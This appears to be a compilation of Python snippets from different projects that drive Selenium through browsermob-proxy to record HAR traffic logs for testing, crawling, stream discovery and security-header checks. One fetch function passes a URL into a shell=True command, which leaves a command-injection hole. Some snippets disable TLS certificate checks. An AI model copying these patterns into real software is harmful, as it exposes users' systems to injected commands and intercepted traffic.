def setupdevices(): """ Description: Sets u browser proxy, Selenium driver, and har object Usage: [driver,proxy]=setupdevices() Inputs: NA Output: Selenium driver Browsermob proxy Browsermob server """ #set up proxy server = Server("############/browsermob-proxy-2.0-beta-9/bin/browsermob-proxy") server.start() proxy = server.create_proxy() profile = webdriver.FirefoxProfile() profile.set_proxy(proxy.selenium_proxy()) proxy.new_har("________") #set up driver driver = webdriver.Firefox(firefox_profile=profile) return (driver,proxy,server)
def save_web_page_stats_to_har(url, webdriver_name, save_to_file): """Generate the HAR archive from an URL with the Selenium webdriver 'webdriver_name', saving the HAR file to 'save_to_file' """ browsermob_server = Server(Config.browsermob_executable) browsermob_server.start() random_port = get_a_random_free_tcp_port() proxy_conn = browsermob_server.create_proxy({"port": random_port}) driver = create_selenium_webdriver(webdriver_name, proxy_conn) try: proxy_conn.new_har(url, options={'captureHeaders': True}) driver.get(url) har_json = json.dumps(proxy_conn.har, ensure_ascii=False, indent=4, separators=(',', ': ')) # Save '.HAR' file with io.open(save_to_file + '.har', mode='wt', buffering=1, encoding='utf8', errors='backslashreplace', newline=None) as output_har_f: output_har_f.write(unicode(har_json)) # Save '.PROF' file with profiling report (timings, sizes, etc) with io.open(save_to_file + '.prof', mode='wb', buffering=1, newline=None) as prof_output: report_har_dictionary(proxy_conn.har, prof_output) finally: proxy_conn.close() browsermob_server.stop() driver.quit()
def main(argv): init() parser = argparse.ArgumentParser() parser.add_argument('-u', action='store', dest='start_url', help='Set page URL', required=True) parser.add_argument('-c', action='store', dest='cookies_file', help='JSON file with cookies', required=False) parser.add_argument('-w', action='store', dest='webdriver_type', help='Set WebDriver type (firefox or phantomjs, firebox by default)', default="firefox", required=False) results = parser.parse_args() start_url = results.start_url cookies_file = results.cookies_file webdriver_type = results.webdriver_type allowed_domain = urlparse(start_url).netloc browsermobproxy_path = get_browsermobproxy_path() options = { 'port': 9090, } server = Server(browsermobproxy_path,options) server.start() proxy = server.create_proxy() if webdriver_type == "phantomjs": service_args = ['--proxy=localhost:9091','--proxy-type=http',] driver = webdriver.PhantomJS(service_args=service_args) driver.set_window_size(1440, 1024) else: profile = webdriver.FirefoxProfile() profile.set_proxy(proxy.selenium_proxy()) driver = webdriver.Firefox(firefox_profile=profile) proxy.new_har('woodpycker', options={'captureHeaders': True, 'captureContent': True}) driver.get(start_url) if not cookies_file is None: with open(cookies_file, 'rb') as fp: cookies = json.load(fp) for cookie in cookies: driver.add_cookie(cookie) driver.refresh() links = driver.find_elements_by_tag_name('a') lenl = len(links) for i in range(0,lenl): if links[i].is_displayed(): url = links[i].get_attribute('href') text = links[i].get_attribute('text') if url.find(allowed_domain) != -1: links[i].click() print "%s Clicked on the link '%s' with HREF '%s'" % (Fore.BLUE+"*"+Fore.RESET,Style.BRIGHT+text+Style.RESET_ALL,Style.BRIGHT+url+Style.RESET_ALL) show_status_codes(proxy.har,allowed_domain) driver.back() driver.refresh() links = driver.find_elements_by_tag_name('a') driver.quit() server.stop()
def setUp(self): """ Start the browser with a browsermob-proxy instance for use by the test. You *must* call this in the `setUp` method of any subclasses before using the browser! Returns: None """ try: # Start server proxy server = Server('browsermob-proxy') server.start() self.proxy = server.create_proxy() proxy_host = os.environ.get('BROWSERMOB_PROXY_HOST', '127.0.0.1') self.proxy.remap_hosts('localhost', proxy_host) except: self.skipTest('Skipping: could not start server with browsermob-proxy.') # parent's setUp super(WebAppPerfReport, self).setUp() # Initialize vars self._page_timings = [] self._active_har = False self._with_cache = False # Add one more cleanup for the server self.addCleanup(server.stop)
def CaptureNetworkTraffic(url,server_ip,headers,file_path): ''' This function can be used to capture network traffic from the browser. Using this function we can capture header/cookies/http calls made from the browser url - Page url server_ip - remap host to for specific URL headers - this is a dictionary of the headers to be set file_path - File in which HAR gets stored ''' port = {'port':9090} server = Server("G:\\browsermob\\bin\\browsermob-proxy",port) #Path to the BrowserMobProxy server.start() proxy = server.create_proxy() proxy.remap_hosts("www.example.com",server_ip) proxy.remap_hosts("www.example1.com",server_ip) proxy.remap_hosts("www.example2.com",server_ip) proxy.headers(headers) profile = webdriver.FirefoxProfile() profile.set_proxy(proxy.selenium_proxy()) driver = webdriver.Firefox(firefox_profile=profile) new = {'captureHeaders':'True','captureContent':'True'} proxy.new_har("google",new) driver.get(url) proxy.har # returns a HAR JSON blob server.stop() driver.quit() file1 = open(file_path,'w') json.dump(proxy.har,file1) file1.close()
def get_driver(self, browser, start_beacon_url): server = Server(BROWSERMOB_LOCATION) server.start() self.proxy = server.create_proxy() driver = webdriver.Firefox(proxy=self.proxy.selenium_proxy()) self.proxy.new_har() self.beacon_url = start_beacon_url return driver
def pytest_runtest_setup(item): logger = logging.getLogger(__name__) if item.config.option.bmp_test_proxy and 'skip_browsermob_proxy' not in item.keywords: if hasattr(item.session.config, 'browsermob_server'): server = item.session.config.browsermob_server else: server = Server(item.config.option.bmp_path, {'port': int(item.config.option.bmp_port)}) item.config.browsermob_test_proxy = server.create_proxy() logger.info('BrowserMob test proxy started (%s:%s)' % (item.config.option.bmp_host, item.config.browsermob_test_proxy.port)) configure_browsermob_proxy(item.config.browsermob_test_proxy, item.config) #TODO make recording of har configurable item.config.browsermob_test_proxy.new_har()
def init_proxy_server(self, port=None): kwargs = {} if port is not None: kwargs['port'] = port if self.chained_proxy is not None: if self.is_https: kwargs['httpsProxy'] = self.chained_proxy else: kwargs['httpProxy'] = self.chained_proxy if self.proxy_username is not None: kwargs['proxyUsername'] = self.proxy_username if self.proxy_password is not None: kwargs['proxyPassword'] = self.proxy_password server = Server('C://browsermob-proxy//bin//browsermob-proxy.bat', options={"port": self.server_port}) server.start() proxy = server.create_proxy(params=kwargs) return server, proxy
def main(): init() if len(sys.argv) >= 2: start_url = sys.argv[1] else: print "You must specify page URL!" sys.exit() allowed_domain = urlparse(start_url).netloc browsermobproxy_path = "/usr/local/opt/browsermobproxy/bin/browsermob-proxy" options = { 'port': 9090, } server = Server(browsermobproxy_path,options) server.start() proxy = server.create_proxy() profile = webdriver.FirefoxProfile() profile.set_proxy(proxy.selenium_proxy()) driver = webdriver.Firefox(firefox_profile=profile) driver.get(start_url) links = driver.find_elements_by_tag_name('a') lenl = len(links) for i in range(0,lenl): if links[i].is_displayed(): url = links[i].get_attribute('href') text = links[i].get_attribute('text') if url.find(allowed_domain) != -1: proxy.new_har('demo') links[i].click() print "%s Clicked on the link '%s' with HREF '%s'" % (Fore.BLUE+"*"+Fore.RESET,Style.BRIGHT+text+Style.RESET_ALL,Style.BRIGHT+url+Style.RESET_ALL) show_status_codes(proxy.har,allowed_domain) driver.back() driver.refresh() links = driver.find_elements_by_tag_name('a') driver.quit() server.stop()
def fetch(url, config, output_directory, fetchEngine="browsermobproxy+selenium", browser="firefox"): if fetchEngine in ("phantomjs", "ph"): data = subprocess.check_output( config['fetchEngines']['phantomjs_command'].replace("$url", url), shell=True ) elif fetchEngine in ("browsermobproxy+selenium", "bs"): from browsermobproxy import Server from selenium import webdriver server = Server(config['fetchEngines']['browsermobproxy_binary']) server.start() proxy = server.create_proxy() if browser in ("firefox", "ff"): profile = webdriver.FirefoxProfile() profile.set_proxy(proxy.selenium_proxy()) driver = webdriver.Firefox(firefox_profile=profile) else: chrome_options = webdriver.ChromeOptions() chrome_options.add_argument("--proxy-server={0}".format(proxy.proxy)) driver = webdriver.Chrome(chrome_options = chrome_options) proxy.new_har(url, options={'captureHeaders': True}) driver.get(url) data = json.dumps(proxy.har, ensure_ascii=False) server.stop() driver.quit() else: sys.exit("Unrecognized engine.") if (data): fileName = output_directory + "/" + url.replace("http://", "").replace("https://", "") + "_" + strftime("%Y-%m-%d_%H:%M:%S", gmtime()) + ".har" f = open(fileName, "w") f.write(data.encode("utf8")) f.close() return fileName else: return None
class CreateHar(object): """create HTTP archive file""" def __init__(self, mob_path): """initial setup""" self.browser_mob = mob_path self.server = self.driver = self.proxy = None @staticmethod def __store_into_file(title, result): """store result""" har_file = open(title + '.har', 'w') har_file.write(str(result)) har_file.close() def __start_server(self): """prepare and start server""" self.server = Server(self.browser_mob) self.server.start() self.proxy = self.server.create_proxy() def __start_driver(self): """prepare and start driver""" profile = webdriver.FirefoxProfile() profile.set_proxy(self.proxy.selenium_proxy()) self.driver = webdriver.Firefox(firefox_profile=profile) def start_all(self): """start server and driver""" self.__start_server() self.__start_driver() def create_har(self, title, url): """start request and parse response""" self.proxy.new_har(title) self.driver.get(url) result = json.dumps(self.proxy.har, ensure_ascii=False) self.__store_into_file(title, result) def stop_all(self): """stop server and driver""" self.server.stop() self.driver.quit()
def get_driver_and_proxy(): global display global driver global proxy if not driver: if int(config.get('browsermob', {}).get('collect-har', 0)): from browsermobproxy import Server server = Server(config['browsermob']['path']) server.start() proxy = server.create_proxy() if int(config.get('xconfig', {}).get('headless', 0)): display = Display(visible=0, size=(800, 600)) display.start() profile = webdriver.FirefoxProfile() if proxy: profile.set_proxy(proxy.selenium_proxy()) driver = webdriver.Firefox(firefox_profile=profile) driver.implicitly_wait(60) return driver, proxy
class Proxy(object): proxy = None proxy_server = None test_id = None def __init__(self, test_id): self.test_id = test_id self.start_proxy() def start_proxy(self): self.proxy_server = Server(config.proxy_bin) self.proxy_server.start() self.proxy = self.proxy_server.create_proxy() if config.blacklist: self.set_blacklist(config.blacklist) self.proxy.new_har(self.test_id) logger.debug('Browsermob proxy started.') return self def stop_proxy(self): filename = '{}.har'.format(self.test_id) with open(filename, 'w') as harfile: json.dump(self.proxy.har, harfile) data = json.dumps(self.proxy.har, ensure_ascii=False) self.proxy_server.stop() self.proxy = None self.proxy_server = None logger.debug('Browsermob proxy stopped. HAR created: {}' .format(filename)) def set_blacklist(self, domain_list): for domain in domain_list: self.proxy.blacklist("^https?://([a-z0-9-]+[.])*{}*.*" .format(domain), 404) logger.debug("Proxy blacklist set.") def get_blacklist(self): return requests.get('{}{}/blacklist' .format(config.proxy_api, self.proxy.port))
class ad_driver(): _driver = None _server = None _proxy = None def __init__(self, path_to_batch, browser="chrome"): """ start browsermob proxy """ self._server = Server(path_to_batch) self._server.start() self._proxy = self._server.create_proxy() """ Init browser profile """ if browser is "chrome": PROXY = "localhost:%s" % self._proxy.port # IP:PORT or HOST:PORT chrome_options = webdriver.ChromeOptions() chrome_options.add_argument('--proxy-server=%s' % PROXY) self._driver = webdriver.Chrome(chrome_options=chrome_options) elif browser is "ff": profile = webdriver.FirefoxProfile() driver = webdriver.Firefox(firefox_profile=profile, proxy=proxy) else: print "Please set 'browser' variable to any of the value \n 'chrome', 'ff' !" self._driver.maximize_window() self._driver.implicitly_wait(20) def execute(self, test): self._proxy.new_har(test["name"]) self._driver.get(_test_data_dir + os.sep + test['file']) time.sleep(2) callToTestMethod = getattr(test_steps, test["name"]) callToTestMethod(self._driver) har = self._proxy.har requests = har['log']['entries'] return requests def quit(self): self._server.stop() self._driver.quit()
def _setup_proxy_server(self, downstream_kbps=None, upstream_kbps=None, latency=None): server = Server(BROWSERMOB_PROXY_PATH) server.start() proxy = server.create_proxy() # The proxy server is pretty sluggish, setting the limits might not # achieve the desired behavior. proxy_options = {} if downstream_kbps: proxy_options['downstream_kbps'] = downstream_kbps if upstream_kbps: proxy_options['upstream_kbps'] = upstream_kbps if latency: proxy_options['latency'] = latency if len(proxy_options.items()) > 0: proxy.limits(proxy_options) return server, proxy
class BrowserMobProxyTestCaseMixin(object): def __init__(self, *args, **kwargs): self.browsermob_server = None self.browsermob_port = kwargs.pop('browsermob_port') self.browsermob_script = kwargs.pop('browsermob_script') def setUp(self): options = {} if self.browsermob_port: options['port'] = self.browsermob_port if not self.browsermob_script: raise ValueError('Must specify --browsermob-script in order to ' 'run browsermobproxy tests') self.browsermob_server = Server( self.browsermob_script, options=options) self.browsermob_server.start() def create_browsermob_proxy(self): client = self.browsermob_server.create_proxy() with self.marionette.using_context('chrome'): self.marionette.execute_script(""" Components.utils.import("resource://gre/modules/Preferences.jsm"); Preferences.set("network.proxy.type", 1); Preferences.set("network.proxy.http", "localhost"); Preferences.set("network.proxy.http_port", {port}); Preferences.set("network.proxy.ssl", "localhost"); Preferences.set("network.proxy.ssl_port", {port}); """.format(port=client.port)) return client def tearDown(self): if self.browsermob_server: self.browsermob_server.stop() self.browsermob_server = None __del__ = tearDown
class BrowserMobProxyTestCaseMixin(object): def __init__(self, *args, **kwargs): self.browsermob_server = None self.browsermob_port = kwargs.pop('browsermob_port') self.browsermob_script = kwargs.pop('browsermob_script') def setUp(self): options = {} if self.browsermob_port: options['port'] = self.browsermob_port if not self.browsermob_script: raise ValueError('Must specify --browsermob-script in order to ' 'run browsermobproxy tests') self.browsermob_server = Server( self.browsermob_script, options=options) self.browsermob_server.start() def create_browsermob_proxy(self): client = self.browsermob_server.create_proxy() with self.marionette.using_context('chrome'): self.marionette.execute_script(""" Services.prefs.setIntPref('network.proxy.type', 1); Services.prefs.setCharPref('network.proxy.http', 'localhost'); Services.prefs.setIntPref('network.proxy.http_port', %(port)s); Services.prefs.setCharPref('network.proxy.ssl', 'localhost'); Services.prefs.setIntPref('network.proxy.ssl_port', %(port)s); """ % {"port": client.port}) return client def tearDown(self): if self.browsermob_server: self.browsermob_server.stop() self.browsermob_server = None __del__ = tearDown
def create_hars(urls, browsermob_dir, run_cached): for url in urls: print 'starting browsermob proxy' server = Server('{}/bin/browsermob-proxy'.format(browsermob_dir)) server.start() proxy = server.create_proxy() profile = webdriver.FirefoxProfile() profile.set_proxy(proxy.selenium_proxy()) driver = webdriver.Firefox(firefox_profile=profile) url_slug = slugify(url) proxy.new_har(url_slug) print 'loading page: {}'.format(url) driver.get(url) har_name = '{}-{}.har'.format(url_slug, time.time()) print 'saving HAR file: {}'.format(har_name) save_har(har_name, proxy.har) if run_cached: url_slug = '{}-cached'.format(slugify(url)) proxy.new_har(url_slug) print 'loading cached page: {}'.format(url) driver.get(url) har_name = '{}-{}.har'.format(url_slug, time.time()) print 'saving HAR file: {}'.format(har_name) save_har(har_name, proxy.har) driver.quit() print 'stopping browsermob proxy' server.stop()
def main(): global proxy_client, proxy_server LOG_FORMAT = "%(asctime)s - %(levelname)s - %(message)s" log_filename = 'logs/test_' + time.strftime("%Y%m%d", time.localtime()) + '.log' logging.basicConfig(filename=log_filename, level=logging.INFO, format=LOG_FORMAT) # 当前脚本所在目录路径 curpath = os.path.dirname(os.path.realpath(__file__)) # 全局config文件 global_config = {} global_config_file_path = curpath + "/config.yaml" if os.path.isfile(global_config_file_path): gf = open(global_config_file_path, 'r', encoding='utf-8') global_config = yaml.safe_load(gf.read()) # 是否传入配置文件 if len(sys.argv) > 1: test_filename = sys.argv[1] config_file = "/config/" + test_filename + ".yaml" else: test_filename = 'default' config_file = "/config/" + test_filename + '.yaml' # yaml配置文件是否存在 config_file_path = curpath + config_file if not os.path.isfile(config_file_path): print("配置文件不存在 " + config_file_path) return 1 f = open(config_file_path, 'r', encoding='utf-8') config = yaml.safe_load(f.read()) # 合并配置 config = Util.recursionMergeTwoDict(global_config, config) # 是否开启代理 is_open_proxy = config.get('BROWSER').get('proxy') if is_open_proxy: from browsermobproxy import Server bmp_path = config.get('BROWSER').get('bmp_path') logging.info('开启代理 ' + bmp_path) proxy_server = Server(bmp_path) proxy_server.start() proxy_client = proxy_server.create_proxy() browser_type = config.get('BROWSER').get('type') if browser_type == 'Firefox': options = FirefoxOptions() options.page_load_strategy = 'normal' if is_open_proxy: options.add_argument('--proxy-server={0}'.format( proxy_client.proxy)) browser = webdriver.Firefox(options=options) elif browser_type == 'Chrome': options = ChromeOptions() options.page_load_strategy = 'normal' if is_open_proxy: options.add_argument('--proxy-server={0}'.format( proxy_client.proxy)) browser = webdriver.Chrome(options=options) else: print('浏览器' + browser_type + ':类型不支持') return False logging.info('开始使用 ' + browser_type + ' 浏览器进行自动化测试') if is_open_proxy: proxy_client.new_har("req", options={ 'captureHeaders': True, 'captureContent': True }) browser.maximize_window() # 浏览器等待时间 # browser.implicitly_wait(10) url = config.get('WEBSITE').get('url') browser.get(url) if is_open_proxy: Http.logHar(proxy_client.har) # 执行配置的TEST对象 test = config.get('TEST') suite = unittest.TestSuite() for key in test: menus = Menu.getMenuConfig(config, key) try: if is_open_proxy: test_data = [browser, menus, proxy_client] else: test_data = [browser, menus] suite.addTest( ParametrizedTestCase.parametrize(Action, 'test_menu', param=test_data)) except AssertExcetion: print(key + " 断言失败") report_file_name = 'reports/' + test_filename + "_" + time.strftime( "%Y%m%d", time.localtime()) + '.html' fp = open(report_file_name, 'w', encoding='utf-8') runner = HTMLTestRunner.HTMLTestRunner(stream=fp, title='你的测试报告', description='使用配置文件:' + config_file_path + '生成的测试报告') runner.run(suite) fp.close() sleep(5) browser.quit() if is_open_proxy: proxy_client.close() proxy_server.stop()
from selenium import webdriver from browsermobproxy import Server import os import json from urllib.parse import urlparse import time from selenium.webdriver.common.action_chains import ActionChains from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as ec import pprint server = Server("") server.start() proxy = server.create_proxy(params={"trustAllServers": "true"}) chromedriver = "" #os.environ["webdriver.chrome.driver"] = chromedriver url = urlparse(proxy.proxy).path #chrome_options = webdriver.ChromeOptions() chrome_options = webdriver.FirefoxOptions() chrome_options.add_argument('ignore-certificate-errors') chrome_options.add_argument("--proxy-server={0}".format(url)) #driver = webdriver.Chrome(chromedriver, chrome_options=chrome_options) driver = webdriver.Firefox(chromedriver, chrome_options) proxy.new_har("universalorlando.com", options={'captureHeaders': True}) driver.get("https://www.universalorlando.com/") #fastrack2 = WebDriverWait(driver, 10).until(ec.visibility_of_element_located((By.XPATH, '//*[@id="btn-1"]')))
class Monitor(object): """ step 3 配置chromedriver 和 browermobproxy 路径 需要使用完整路径,否则browsermobproxy无法启动服务 我是将这两个部分放到了和monitor.py同一目录 同时设置chrome为屏蔽图片,若需要抓取图片可自行修改 """ PROXY_PATH = path.abspath( r"D:\Anaconda3\browsermob-proxy-2.1.4\bin/browsermob-proxy.bat") CHROME_PATH = path.abspath(r"D:\Anaconda3\chromedriver.exe") CHROME_OPTIONS = {"profile.managed_default_content_settings.images": 2} def __init__(self): """ 类初始化函数暂不做操作 """ pass def initProxy(self): """ step 4 初始化 browermobproxy 设置需要屏蔽的网络连接,此处屏蔽了css,和图片(有时chrome的设置会失效),可加快网页加载速度 新建proxy代理地址 """ self.server = Server(self.PROXY_PATH) self.server.start() self.proxy = self.server.create_proxy() self.proxy.blacklist([ "http://.*/.*.css.*", "http://.*/.*.jpg.*", "http://.*/.*.png.*", "http://.*/.*.gif.*" ], 200) def initChrome(self): """ step 5 初始化selenium, chrome设置 将chrome的代理设置为browermobproxy新建的代理地址 """ chromeSettings = webdriver.ChromeOptions() chromeSettings.add_argument('--proxy-server={host}:{port}'.format( host="localhost", port=self.proxy.port)) chromeSettings.add_experimental_option("prefs", self.CHROME_OPTIONS) self.driver = webdriver.Chrome(executable_path=self.CHROME_PATH, chrome_options=chromeSettings) def genNewRecord(self, name="monitor", options={'captureContent': True}): """ step 6 新建监控记录,设置内容监控为True """ self.proxy.new_har(name, options=options) def getContentText(self, targetUrl): """ step 7 简单的获取目标数据的函数 其中 targetUrl 为浏览器获取对应数据调用的url,需要用正则表达式表示 """ if self.proxy.har['log']['entries']: for loop_record in self.proxy.har['log']['entries']: try: if re.fullmatch(targetUrl, loop_record["request"]['url']): return loop_record["response"]['content']["text"] except Exception as err: print(err) continue return None def start(self): """step 8 配置monitor的启动顺序""" try: self.initProxy() self.initChrome() print('初始化完成') except Exception as err: print(err) def quit(self): """ step 9 配置monitor的退出顺序 代理sever的退出可能失败,目前是手动关闭,若谁能提供解决方法,将不胜感激 """ self.driver.close() self.driver.quit() try: self.proxy.close() self.server.process.terminate() self.server.process.wait() self.server.process.kill() except OSError: pass
def analyze(site): try: site = re.sub(r'^https?://', '', site) response = requests.get(f'http://{site}', timeout=10, headers={'User-Agent': USER_AGENT_CHROME}) redirected_hostname = urlparse(response.url).hostname redirected_site = re.sub(r'^https?://', '', response.url) # phase 0 http_redirection_result = analyze_http_redirection(response) # phase 1 tls_result = analyze_tls(redirected_hostname) # phase 2 response = requests.get(f'https://{redirected_site}', timeout=10, headers={'User-Agent': USER_AGENT_CHROME}) response_ie = requests.get(f'https://{redirected_site}', timeout=10, headers={'User-Agent': USER_AGENT_IE}) response_headers = response.headers response_cookies = response.cookies response_url = response.url soup = BeautifulSoup(response.text, features='html.parser') server = Server(BROWSERMOB_PROXY_PATH) server.start() proxy = server.create_proxy() options = webdriver.ChromeOptions() options.add_argument(f'--proxy-server={proxy.proxy}') options.add_argument('--headless') driver = webdriver.Chrome(options=options) proxy.new_har() driver.get(f'https://{redirected_site}') har_entries = proxy.har['log']['entries'] with open('libraries.js') as f: javascript = f.read() third_party_libs = driver.execute_script(javascript) proxy.close() server.stop() driver.quit() hsts_result = analyze_hsts(response_headers) hpkp_result = analyze_hpkp(response_headers) x_content_type_options_result = analyze_x_content_type_options( response_headers) x_xss_protection_result = analyze_x_xss_protection(response_headers) x_frame_options_result = analyze_x_frame_options(response_headers) x_download_options_result = analyze_x_download_options( response_ie.headers) expect_ct_result = analyze_expect_ct(response_headers) # phase 3 cookie_security_result = analyze_cookie_security( response_cookies, soup) cors_policy_result = analyze_cors_policy(response_headers, response_url) csp_result = analyze_csp(redirected_site) csrf_result = analyze_csrf(response_cookies, soup) cors_result = analyze_cors(soup, har_entries) referrer_policy_result = analyze_referrer_policy( response_headers, response_url, soup, har_entries) cache_control_result = analyze_cache_control(response_headers, soup) leaking_server_software_info_result = analyze_leaking_server_software_info( response_headers) # phase 4 mixed_content_result = analyze_mixed_content(har_entries) sri_result = analyze_sri_protection(soup) cross_domain_existence_result = analyze_cross_domain_existence( response_url, har_entries) third_party_libs_result = analyze_third_party_libs(third_party_libs) result = SuccessResult( site=site, timestamp=datetime.datetime.now(), http_redirection_result=http_redirection_result, tls_result=tls_result, hsts_result=hsts_result, hpkp_result=hpkp_result, x_content_type_options_result=x_content_type_options_result, x_xss_protection_result=x_xss_protection_result, x_frame_options_result=x_frame_options_result, x_download_options_result=x_download_options_result, expect_ct_result=expect_ct_result, cookie_security_result=cookie_security_result, cors_policy_result=cors_policy_result, cors_result=cors_result, csp_result=csp_result, csrf_result=csrf_result, referrer_policy_result=referrer_policy_result, cache_control_result=cache_control_result, leaking_server_software_info_result= leaking_server_software_info_result, mixed_content_result=mixed_content_result, sri_result=sri_result, cross_domain_existence_result=cross_domain_existence_result, third_party_libs_result=third_party_libs_result) except Exception as e: result = ErrorResult(site=site, timestamp=datetime.datetime.now(), error_msg=str(e)) return result
class Fetcher: def __init__(self): self.server = None self.proxy = None self.browser = None self.driver = None def set_remote_server(self, host, port): """Defines an already running proxy server for gathering includes and content """ self.server = RemoteServer(host, port) self.proxy = self.server.create_proxy() def start_local_server(self, binpath=None): """Starts a local instance of BrowserMob. Keyword Arguments: binpath -- The full path, including the binary name to the browsermob-proxy binary. """ if binpath is None: binpath="{0}/browsermob-proxy-2.1.0-beta-4/bin/browsermob-proxy".format(getcwd()) self.server = Server(binpath) self.server.start() self.proxy = self.server.create_proxy() def set_firefox(self): """Sets the Webdriver for Firefox""" self.profile = webdriver.FirefoxProfile() self.profile.set_proxy(self.proxy.selenium_proxy()) self.driver = webdriver.Firefox(firefox_profile=self.profile) def run(self, site, name='fetch'): """Runs an instance of the Fetcher. Requires that either set_remote_server() or start_local_server() has been previously called. Keyword Arguments: site -- The URL of the site to load. name -- Name of the resulting HAR. """ try: self.proxy.headers({'Via': None}) # TODO: Need to override BrowserMob to remove the Via Header - https://github.com/lightbody/browsermob-proxy/issues/213 self.proxy.new_har(name, options={ 'captureHeaders': True, 'captureContent': True, 'captureBinaryContent': True }) self.driver.get(site) har = self.proxy.har har['dom'] = self.driver.page_source return har except AttributeError: print "[!] FAILED: Ensure you have set a Webdriver" def close(self): try: self.proxy.stop() # The proxy won't need to be stopped if using remote_server() except AttributeError: pass try: self.driver.close() except AttributeError: print '[!] Driver not found'
def _real_extract(self, url): try: with OnlyFansPostIE._LOCK: while True: _server_port = 18080 + 100 * OnlyFansPostIE._NUM _server = Server( path= "/Users/antoniotorres/Projects/async_downloader/browsermob-proxy-2.1.4/bin/browsermob-proxy", options={'port': _server_port}) if _server._is_listening(): OnlyFansPostIE._NUM += 1 if OnlyFansPostIE._NUM == 25: raise Exception("mobproxy max tries") else: _server.start({'log_path': '/dev', 'log_file': 'null'}) OnlyFansPostIE._NUM += 1 break _host = 'localhost' _port = _server_port + 1 _harproxy = _server.create_proxy({'port': _port}) driver = self.get_driver(host=_host, port=_port) self.send_driver_request(driver, self._SITE_URL) for cookie in OnlyFansPostIE._COOKIES: driver.add_cookie(cookie) self.report_extraction(url) post, account = re.search(self._VALID_URL, url).group("post", "account") self.to_screen("post:" + post + ":" + "account:" + account) entries = {} _harproxy.new_har(options={ 'captureHeaders': False, 'captureContent': True }, ref=f"har_{post}", title=f"har_{post}") self.send_driver_request(driver, url) res = self.wait_until(driver, 30, error404_or_found()) if not res or res[0] == "error404": raise ExtractorError("Error 404: Post doesnt exists") har = _harproxy.har data_json = self.scan_for_request(har, f"har_{post}", f"/api2/v2/posts/{post}") if data_json: self.write_debug(data_json) _entry = self._extract_from_json(data_json, user_profile=account) if _entry: for _video in _entry: if not _video['id'] in entries.keys(): entries[_video['id']] = _video else: if _video['duration'] > entries[ _video['id']]['duration']: entries[_video['id']] = _video if entries: return self.playlist_result(list(entries.values()), "Onlyfans:" + account, "Onlyfans:" + account) else: raise ExtractorError("No entries") except ExtractorError as e: raise except Exception as e: lines = traceback.format_exception(*sys.exc_info()) self.to_screen(f'{repr(e)} \n{"!!".join(lines)}') raise ExtractorError(repr(e)) finally: _harproxy.close() _server.stop() self.rm_driver(driver)
def _real_extract(self, url): try: self.report_extraction(url) with OnlyFansPaidlistIE._LOCK: _server_port = 18080 + 100 * OnlyFansPaidlistIE._NUM OnlyFansPaidlistIE._NUM += 1 _server = Server( path= "/Users/antoniotorres/Projects/async_downloader/browsermob-proxy-2.1.4/bin/browsermob-proxy", options={'port': _server_port}) _server.start({'log_path': '/dev', 'log_file': 'null'}) _host = 'localhost' _port = _server_port + 1 _host = 'localhost' _harproxy = _server.create_proxy({'port': _port}) driver = self.get_driver(host=_host, port=_port) _harproxy.new_har(options={ 'captureHeaders': False, 'captureContent': True }, ref="har_paid", title="har_paid") self.send_driver_request(driver, self._SITE_URL) for cookie in OnlyFansPaidlistIE._COOKIES: driver.add_cookie(cookie) self.send_driver_request(driver, self._SITE_URL) list_el = self.wait_until( driver, 60, ec.presence_of_all_elements_located( (By.CLASS_NAME, "b-tabs__nav__item"))) for el in list_el: if re.search(r'(?:purchased|comprado)', el.get_attribute("textContent").lower()): el.click() break self.wait_until( driver, 60, ec.presence_of_element_located((By.CLASS_NAME, "user_posts"))) self.wait_until(driver, 600, scroll(10)) har = _harproxy.har users_json = self.scan_for_all_requests(har, "har_paid", r'/api2/v2/users/list') if users_json: self.to_screen("users list attempt success") users_dict = dict() for _users in users_json: for user in _users.keys(): users_dict.update( {_users[user]['id']: _users[user]['username']}) else: self.to_screen("User-dict loaded manually") users_dict = dict() users_dict.update({ 127138: 'lucasxfrost', 1810078: 'sirpeeter', 5442793: 'stallionfabio', 7820586: 'mreyesmuriel' }) self.to_screen(users_dict) entries = {} _reg_str = r'/api2/v2/posts/paid\?' data_json = self.scan_for_all_requests(har, "har_paid", _reg_str) if data_json: self.write_debug(data_json) list_json = [] for el in data_json: list_json += el['list'] for info_json in list_json: for _video in self._extract_from_json( info_json, users_dict=users_dict): if not _video['id'] in entries.keys(): entries[_video['id']] = _video else: if _video.get('duration', 1) > entries[_video['id']].get( 'duration', 0): entries[_video['id']] = _video if entries: return self.playlist_result(list(entries.values()), "Onlyfans:paid", "Onlyfans:paid") else: raise ExtractorError("no entries") except ExtractorError as e: raise except Exception as e: lines = traceback.format_exception(*sys.exc_info()) self.to_screen(f'{repr(e)} \n{"!!".join(lines)}') raise ExtractorError(repr(e)) finally: _harproxy.close() _server.stop() self.rm_driver(driver)
def stream_collector(): server = Server("/root/xhprof/browsermob-proxy-2.1.4/bin/browsermob-proxy") server.start() proxy = server.create_proxy() chrome_options = Options() # Avoid the bug "DevToolActivePort file doesn't exist" chrome_options.add_argument('--no-sandbox') chrome_options.add_argument('--disable-dev-shm-usage') # Use headless browser to implement web automation chrome_options.add_argument('--headless') chrome_options.add_argument('--ignore-certificate-errors') chrome_options.add_argument('--proxy-server={0}'.format(proxy.proxy)) # Turn on the chrome driver chrome_driver = "/usr/bin/chromedriver" driver = webdriver.Chrome(executable_path=chrome_driver, chrome_options=chrome_options) # Provide the url of the target website # The link is found in the source code of the website and it is embedded in a static page base_url = "https://media.tvm.com.mt/16958960.ihtml/player.html?source=embed&live_id=16966825&tvm_location=tvm1_live" proxy.new_har("tvm.com.mt/mt/live", options={ 'captureHeaders': True, 'captureContent': True }) driver.get(base_url) print("Connecting to the website(TVM)...") try: # Locate the corresponding element of the button and click it. # In this case, we would like to implement the automation because no visible browser is available. # Hence, this section faciliates to click the play button in order to obtain the live streams. driver.find_element_by_xpath("//*[@class='big-play-button']").click() time.sleep(5) print("Click the button!") time.sleep(5) result = proxy.har for entry in result['log']['entries']: _url = entry['request']['url'] # Filter the urls based on three key elements, "m3u8" , "chunklist" and "b2" # because we aim to find the stream which is in high quality. if "m3u8" in _url and "chunklist" in _url: print("Congrats! The live stream is shown in the following!") print(_url) # Save the stream save_stream(_url) # Once obtaining the target url, stop the server and quit the driver. server.stop() driver.quit() break except: # Some errors happened and it takes too much time print("Sorry, it's not working!") server.stop() driver.quit()
